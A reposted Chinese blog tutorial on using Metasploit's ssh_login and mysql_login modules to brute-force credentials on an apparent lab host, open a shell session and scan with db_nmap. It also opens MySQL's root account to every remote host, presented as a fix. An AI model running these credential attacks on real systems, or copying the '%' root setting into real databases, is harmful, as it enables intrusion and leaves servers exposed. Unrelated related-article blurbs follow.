msfconsole中ssh_login模块的使用以及使用时MySQL数据库连接不上时的解决办法

本文主要是介绍msfconsole中ssh_login模块的使用以及使用时MySQL数据库连接不上时的解决办法,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

3.ssh_login攻击(ssh_login模块的使用)

3.1搜索ssh_login模块
  search ssh_login搜索模块

3.2进入并使用模块
 use 0(这里0表示前面的编号)

3.3查看需要设置的参数
 show options

yes表示必要设置的参数

no表示可以设置也可以不用设置的参数

3.4 设置RHOSTS参数
 set RHOSTS 192.168.251.139

3.5设置用户名密码的字典
  cd /optlsmkdir dictlscd /dictvim username.txtvim password.txt

3.6设置USER_fILE和 pass_fILE参数
  set uSER_fILE /opt/dict/username.txtset pass_fILE /opt/dict/password.txt这里不区分大小写

我这里仅仅只使用了username.txt,修改一下

3.7 run启动命令
 run

3.8 sessions查看启动成功后创建的session
 sessions

3.9 进入靶机
 sessions -i 1(1表示前面的id)

3.10进入靶机成功后尝试敲一些基础命令验证石佛偶进入靶机
 pwdwhoamiexit

表示进入靶机成功

4.mysql_login攻击(mysql_login模块的使用)

4.1 db_nmap -sP 192.168.251.0/24的用法
  db_nmap -sP 192.168.251.0/24将查询到的结果存入到数据库中

4.2 IP地址查询
 hosts地址查询

4.3 查询地址开放的端口号
  db_nmap -sS 192.168.251.139(IP地址)查询地址开放的端口号并将其写入到数据库中

4.4 将C段结果放入到数据库中
  db_nmap -Pn -sV 192.168.251.139

但是这里出现了报错,经过一系列排查后发现是数据库的原因,是由于数据库没有打开,按照上面开启数据库的办法将数据库打开就ok了

重新运行

出现这个表明运行成功

4.5 使用services查看IP地址所开放的端口
 services

4.6 查询mysql_login 模块
  search mysql_login

4.7 使用模块
 use 0

4.8 show options查询可以修改的参数
 show options

4.9设置密码
 set password 123456789

4.10 设置靶机IP地址
 set rhosts 192.168.251.1

4.11 run运行
 run

这里没有运行成功

排查问题后发现是数据库不能远程连接,为什么连接不上呢?

原因

(1) MySQL建用户的时候会指定一个host,默认是127.0.0.1/localhost只能本机访问;

(2) 其它机器用这个用户帐号访问会提示没有权限

4.12 解决办法
4.12.1 进入MySQL数据库
 mysql -u root -pEnter password:输入你的密码

4.12.2 进入mysql库
 use mysql

4.12.3 查看用户
 select host,user from user;
4.12.4 修改host

修改host原因: %为任意用户都有权限连接,localhost为只能本机连接,配置完host为%这一步就已经能外网访问了

  update user set host='%' where user='root';

4.12.5 修改成功后重新查看数据库信息
 select host,user from user;

修改成功

4.13 再次run运行
 run

4.14 查看数据库里面收集的信息
 creds

这里查询到了我们刚刚对数据库的操作

这篇关于msfconsole中ssh_login模块的使用以及使用时MySQL数据库连接不上时的解决办法的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/797534

相关文章

使用DeepSeek搭建个人知识库(在笔记本电脑上)

《使用DeepSeek搭建个人知识库(在笔记本电脑上)》本文介绍了如何在笔记本电脑上使用DeepSeek和开源工具搭建个人知识库,通过安装DeepSeek和RAGFlow,并使用CherryStudi... 目录部署环境软件清单安装DeepSeek安装Cherry Studio安装RAGFlow设置知识库总

mysql关联查询速度慢的问题及解决

《mysql关联查询速度慢的问题及解决》:本文主要介绍mysql关联查询速度慢的问题及解决方案,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录mysql关联查询速度慢1. 记录原因1.1 在一次线上的服务中1.2 最终发现2. 解决方案3. 具体操作总结mysql

Linux搭建Mysql主从同步的教程

《Linux搭建Mysql主从同步的教程》:本文主要介绍Linux搭建Mysql主从同步的教程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录linux搭建mysql主从同步1.启动mysql服务2.修改Mysql主库配置文件/etc/my.cnf3.重启主库my

Jmeter如何向数据库批量插入数据

《Jmeter如何向数据库批量插入数据》:本文主要介绍Jmeter如何向数据库批量插入数据方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录Jmeter向数据库批量插入数据Jmeter向mysql数据库中插入数据的入门操作接下来做一下各个元件的配置总结Jmete

Python FastAPI入门安装使用

《PythonFastAPI入门安装使用》FastAPI是一个现代、快速的PythonWeb框架,用于构建API,它基于Python3.6+的类型提示特性,使得代码更加简洁且易于绶护,这篇文章主要介... 目录第一节:FastAPI入门一、FastAPI框架介绍什么是ASGI服务(WSGI)二、FastAP

MySql中的数据库连接池详解

《MySql中的数据库连接池详解》:本文主要介绍MySql中的数据库连接池方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录mysql数据库连接池1、概念2、为什么会出现数据库连接池3、原理4、数据库连接池的提供商5、DataSource数据源6、DBCP7、C

Spring-AOP-ProceedingJoinPoint的使用详解

《Spring-AOP-ProceedingJoinPoint的使用详解》:本文主要介绍Spring-AOP-ProceedingJoinPoint的使用方式,具有很好的参考价值,希望对大家有所帮... 目录ProceedingJoinPoijsnt简介获取环绕通知方法的相关信息1.proceed()2.g

Maven pom.xml文件中build,plugin标签的使用小结

《Mavenpom.xml文件中build,plugin标签的使用小结》本文主要介绍了Mavenpom.xml文件中build,plugin标签的使用小结,文中通过示例代码介绍的非常详细,对大家的学... 目录<build> 标签Plugins插件<build> 标签<build> 标签是 pom.XML

MySQL的隐式锁(Implicit Lock)原理实现

《MySQL的隐式锁(ImplicitLock)原理实现》MySQL的InnoDB存储引擎中隐式锁是一种自动管理的锁,用于保证事务在行级别操作时的数据一致性和安全性,本文主要介绍了MySQL的隐式锁... 目录1. 背景:什么是隐式锁?2. 隐式锁的工作原理3. 隐式锁的类型4. 隐式锁的实现与源代码分析4

MySQL中Next-Key Lock底层原理实现

《MySQL中Next-KeyLock底层原理实现》Next-KeyLock是MySQLInnoDB存储引擎中的一种锁机制,结合记录锁和间隙锁,用于高效并发控制并避免幻读,本文主要介绍了MySQL中... 目录一、Next-Key Lock 的定义与作用二、底层原理三、源代码解析四、总结Next-Key L